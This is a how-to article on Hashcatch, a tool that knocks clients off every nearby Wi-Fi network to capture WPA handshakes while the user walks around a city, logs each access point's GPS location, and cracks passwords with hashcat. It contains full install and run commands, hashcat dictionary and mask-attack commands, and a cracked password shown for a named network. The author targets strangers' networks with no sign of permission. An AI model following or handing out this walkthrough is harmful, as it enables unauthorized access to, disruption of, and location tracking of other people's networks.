How to capture handshakes of Wi-Fi networks automatically

Programs for automatic capture of Wi-Fi handshakes

There are already several options available for automatically capturing handshakes from Wi-Fi access points, for example:

  • Besside-ng – works great and saves only good handshakes that are suitable for password cracking. Disadvantage: it scans for networks once and does not see new Wi-Fi networks that later come into range. That is, when moving around the city, this program is ineffective.
  • zizzania – has the same main drawback: when new Access Points appear, it most likely does not see them. Capture efficiency is not always the best.

Hashcatch deauthenticates clients connected to all nearby Wi-Fi networks and tries to capture the handshakes. It can be used on any Linux device, including Raspberry Pi and Nethunter devices, so that you can capture handshakes while walking your dog. Hashcatch runs indefinitely until a keyboard interrupt.

The Hashcatch script periodically rescans for new Wi-Fi networks and adds them to the attack. That is, if you want to get handshakes in automatic mode, you can run this script not while sitting in front of a particular AP, but when leaving the house. The program will try to capture handshakes from all Access Points it meets along your entire route. Clearly, you need to move slowly enough, stopping near places where Wi-Fi networks are likely to be concentrated.

How to install Hashcatch on Kali Linux

Dependency Installation:

sudo apt install hcxtools jq

Creating the necessary folders and files for the program:

sudo mkdir -p /usr/share/hashcatch/handshakes/ /etc/hashcatch/
sudo touch /usr/share/hashcatch/db

Download script:

git clone https://github.com/staz0t/hashcatch
cd hashcatch/

Now you need to generate the configuration file. To do this, run the command:

sudo ./hashcatch --setup

The script will ask you for the name of the wireless interface. If you do not remember it, use the command:

iw dev

In the future, if you need to choose a different wireless interface to use, then run the command again:

sudo ./hashcatch --setup

Or simply open the /etc/hashcatch/hashcatch.conf file with any text editor and enter the name you need.

By the way, when running, the program saves the captured handshakes to the /usr/share/hashcatch/handshakes/ folder, and information about the APs for which a handshake was caught is written to the /usr/share/hashcatch/db file. These settings are hard-coded in the script.

If you wish, you can change them to more convenient locations by editing the script:

gedit hashcatch

To do this, replace the values of these variables:

f_config="/etc/hashcatch/hashcatch.conf"
f_db="/usr/share/hashcatch/db"
d_handshakes="/usr/share/hashcatch/handshakes/"

If you have only one Wi-Fi interface, it is recommended to close programs that may affect it:

sudo systemctl stop NetworkManager
sudo airmon-ng check kill

If the interface is down, set it to up (replace wlan0 with your interface name):

sudo ip link set wlan0 up

If you encounter the error

\033[1;33m[!] The following packages are missing. Install them and try again!\033[0m

that is, the program complains about the lack of packages, but does not report which ones, then run the following commands:

git clone https://github.com/hashcat/hashcat-utils
cd hashcat-utils/src/
make
sudo mv *.bin /usr/local/bin/
sudo cp -a *.pl /usr/local/bin/
sudo ln -s /usr/local/bin/cap2hccapx.bin /usr/local/bin/cap2hccapx

Continuous Wi-Fi Handshake Capture

Run the program:

sudo ./hashcatch

The Hashcatch program puts the interface into monitor mode in a slightly unusual way, as follows:

sudo aireplay-ng --test INTERFACE

This command does enable monitor mode, but it also checks whether the Wi-Fi card supports wireless injection. If the test fails, Hashcatch quits and reports that the interface could not be put into monitor mode. Therefore, each launch of Hashcatch takes some time and, if it did not work the first time, it makes sense to try launching it several more times.

Immediately after this, it begins to search for wireless networks, then deauthenticates clients of these networks and tries to capture handshakes.

The program runs continuously until you press CTRL+c. During operation, as well as after completion, it reports exactly how many handshakes were captured:

[*] Handshakes captured this session: 1

Location details of a router's MAC address

Hashcatch writes the access points for which handshakes were captured to the /usr/share/hashcatch/db file. To view the contents of this file:

cat /usr/share/hashcatch/db

Record Structure:

MAC_address,AP_NAME,LATITUDE,LONGITUDE,ACCURACY,TIME

Record Example:

C8:38:70:AD:BB:48,AndroidAP,55.96663351105,37.41517074071,29.982,1567406604

Values are separated by commas. You can search by latitude and longitude on Google Maps: https://www.google.com/maps/. Just enter these two numbers, for example:

55.96663351105,37.41517074071

By the way, you can directly access the address of the form: https://www.google.com/maps/place/LATITUDE,LONGITUDE, for example https://www.google.com/maps/place/55.96663351105,37.41517074071

There are many Wi-Fi geolocation services; Hashcatch uses a service from Alexander Mylnikov. The API does not require a key: just take the BSSID (MAC address) of the Access Point of interest and open a link of the form https://api.mylnikov.org/geolocation/wifi?v=1.2&bssid=BSSID, for example, https://api.mylnikov.org/geolocation/wifi?v=1.2&bssid=C8:38:70:AD:BB:48.
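
The record structure above can be parsed as follows. This is an added example, not part of Hashcatch or of the original article: it splits each db record from both ends so that an AP name containing commas stays intact, converts TIME to UTC and builds the Google Maps link of the form shown above. The function names, the two made-up sample lines and the treatment of empty coordinate fields as "no location" are assumptions.

```python
import re
from datetime import datetime, timezone

MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")

# Constructed sample: line 1 is the record from the article; lines 2-3 are
# made up (comma in the SSID with empty coordinates; a truncated line).
SAMPLE_DB = """\
C8:38:70:AD:BB:48,AndroidAP,55.96663351105,37.41517074071,29.982,1567406604
02:00:00:00:00:01,Cafe, 2nd floor,,,,1567406700
02:00:00:00:00:02,Broken
"""

def _num(field):
    """Return the field as float, or None when empty or non-numeric."""
    try:
        return float(field)
    except ValueError:
        return None

def parse_db_line(line):
    """Parse one MAC,AP_NAME,LATITUDE,LONGITUDE,ACCURACY,TIME record."""
    # SSIDs may contain commas: MAC from the left, four fields from the right.
    mac, _, rest = line.strip().partition(",")
    parts = rest.rsplit(",", 4)
    if len(parts) != 5 or not MAC_RE.match(mac):
        raise ValueError(f"malformed db record: {line!r}")
    name, lat, lon, acc, ts = parts
    # Assumption: a record without a location has empty coordinate fields.
    located = _num(lat) is not None and _num(lon) is not None
    seen = datetime.fromtimestamp(int(ts), tz=timezone.utc)
    return {
        "bssid": mac.upper(), "ssid": name, "lat": _num(lat), "lon": _num(lon),
        "accuracy": _num(acc), "seen_utc": seen.isoformat(),
        "map_url": f"https://www.google.com/maps/place/{lat},{lon}" if located else None,
    }

def parse_db(text):
    """Return (records, rejected_lines) for the whole db file content."""
    records, rejected = [], []
    for line in filter(str.strip, text.splitlines()):
        try:
            records.append(parse_db_line(line))
        except ValueError:
            rejected.append(line)
    return records, rejected

if __name__ == "__main__":
    print(*parse_db(SAMPLE_DB)[0], sep="\n")
```

Each record ties a BSSID to a network name, a place and a time, so the db file should be handled as location data.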

Ignore list

You can also add an ‘ignore’ field to mention the WiFi networks you want hashcatch to ignore while running.

If you have already captured handshakes for some wireless networks, then it makes sense to ignore them. Another example of the use of the ignore list: I launched Hashcatch, put the laptop in my backpack and went for a walk to see how many handshakes I could get. In order for the computer to be constantly connected to the Internet, I created a Wi-Fi hotspot on my mobile phone and connected to it from my laptop with a second (built-in) Wi-Fi card. I needed this so that Hashcatch is able to receive coordinates for APs.

In order not to attack some APs, open the configuration file /etc/hashcatch/hashcatch.conf:

gedit /etc/hashcatch/hashcatch.conf

And add the ignore directive there and list the APs that do not need to be attacked. For example, I have this AndroidAP:

interface=wlp0s20f0u4
ignore=AndroidAP

If you want to exclude several APs, separate them with commas. It's okay if the AP names contain spaces, but there should be no spaces next to the equal sign (=) or around the commas, for example:

interface=wlan0
ignore=Google Starbucks,AndroidAP

By the way, so that the computer does not turn off after some “downtime”, and does not turn off immediately after you close the lid of the laptop, you need to set the power settings correctly.

Captured Handshake Analysis

You can view the list of handshakes with the command:

ls -l /usr/share/hashcatch/handshakes/

Each handshake is placed in a separate file.

To verify them, you can run the following command:

sudo aircrack-ng /usr/share/hashcatch/handshakes/*

Hacking Wi-Fi Hashes

You can brute-force the passwords for captured hashes with different programs; the fastest of them is Hashcat.

To start a dictionary attack against a Wi-Fi hash, a command of the following form is used:

hashcat -m 2500 '/usr/share/hashcatch/handshakes/HASH.hccapx' DICTIONARY.txt

To start a mask attack against a Wi-Fi hash, a command of the following form is used:

hashcat -m 2500 -a 3 '/usr/share/hashcatch/handshakes/HASH.hccapx' MASK

For example, with the following command, I launched an attack against the 14:9D:09:CF:F5:08.hccapx hash using the mask 6?d?d?d?d?d?d?d?d. This mask means 9 characters, the first of which is the number 6, and the rest can be any numbers – these are typical phone numbers for places where the handshake is captured:

hashcat -m 2500 -a 3 --hwmon-temp-abort=100 '/usr/share/hashcatch/handshakes/14:9D:09:CF:F5:08.hccapx' 6?d?d?d?d?d?d?d?d

Hacking was successful, the found Wi-Fi password is in the line:

8053b8ba46189df8b8e916053ca7bbff:149d09cff508:6cab317133a5:3BB-SAYJAI:670323273

3BB-SAYJAI is the name of the Access Point, and 670323273 is the password for it.


Troubleshooting

Error:

[-] Could not set wireless adapter to monitor mode. Run with --setup and try again!

It means that you need to run the program with the --setup switch and then specify the name of the Wi-Fi interface.

Error:

[-] Could not set the given wireless adapter to monitor mode!

It means that the program cannot: 1) set the interface into monitor mode; or 2) successfully complete the wireless injection test. If your adapter supports both monitor mode and wireless injection, then try starting the program again.

Error:

[-] Interface not mentioned in config file. Run with --setup and try again!

It means that: 1) the Wi-Fi interface is not specified in the configuration file, or 2) the specified Wi-Fi dongle is not plugged into the computer at the moment. Therefore, plug in the wireless adapter or run the program with the --setup switch to specify the name of another interface.

Please note that in BlackArch, where the program is installed from the standard repository, each update of the program deletes all previously captured handshakes, deletes the /usr/share/hashcatch/db file and erases the configuration file!

Conclusion

In general, the script is quite simple, but the task of capturing handshakes is quite simple as well, so it copes with it. I especially like the fact that each captured handshake is saved in a separate file – it is very convenient, you can immediately proceed to password brute-force.

In one of the following articles, I will talk about another excellent program for automatically capturing handshakes while constantly monitoring the emergence of new Wi-Fi networks with the addition of them to attack. In addition, that program also automatically captures PMKID!
